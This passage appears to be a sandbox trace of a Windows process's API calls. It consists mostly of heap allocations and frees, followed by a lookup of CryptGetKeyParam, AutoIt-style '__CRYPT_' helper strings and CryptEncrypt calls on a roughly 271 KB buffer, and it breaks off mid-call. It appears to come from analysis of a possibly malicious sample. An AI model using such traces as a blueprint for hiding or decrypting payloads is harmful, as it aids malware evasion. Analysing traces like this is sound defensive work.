returned 0x9c2738 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9d8 [0176.311] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.311] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db2e8 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2818 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.312] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2748 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.312] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fa0 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0a0 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x90d420 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x44) returned 0x9aa4a8 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2748 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.313] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2818 [0176.313] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0176.314] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0176.314] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0176.314] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28e8 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.315] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.315] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0176.316] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x90d420, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0176.316] GetProcAddress (hModule=0x74f20000, lpProcName="CryptGetKeyParam") returned 0x74f477cb [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2868 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28e8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27f8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df140 | out: hHeap=0x8a0000) returned 1 [0176.316] CryptGetKeyParam (in: hKey=0x90af98, dwParam=0x7, pbData=0x9c2798, pdwDataLen=0x87e2f0, dwFlags=0x0 | out: pbData=0x9c2798*=0x660e, pdwDataLen=0x87e2f0*=0x4) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.316] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27b8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2748 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2818 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26e8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0176.317] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd438 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd360 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db2e8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.318] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.318] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26f8 | out: hHeap=0x8a0000) returned 1 [0176.319] PeekMessageW (in: lpMsg=0x87e924, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e924) returned 0 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd708 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2768 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9aa4a8 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0176.319] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0a0 | out: hHeap=0x8a0000) returned 1 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.319] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.320] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0176.320] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0176.320] PeekMessageW (in: lpMsg=0x87e7c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7c4) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.320] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0176.320] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87e98c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e98c) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ebe4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ebe4) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.320] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.320] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.320] PeekMessageW (in: lpMsg=0x87e7d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87e7d4) returned 0 [0176.324] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.324] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x87e820*=0x42400, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x87e820*=0x42410) returned 1 [0176.324] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0176.324] CharLowerBuffW (in: lpsz="byte[271377]", cchLength=0xc | out: lpsz="byte[271377]") returned 0xc [0176.338] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0176.343] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0176.343] CryptEncrypt (in: hKey=0x90af98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xb03828*, 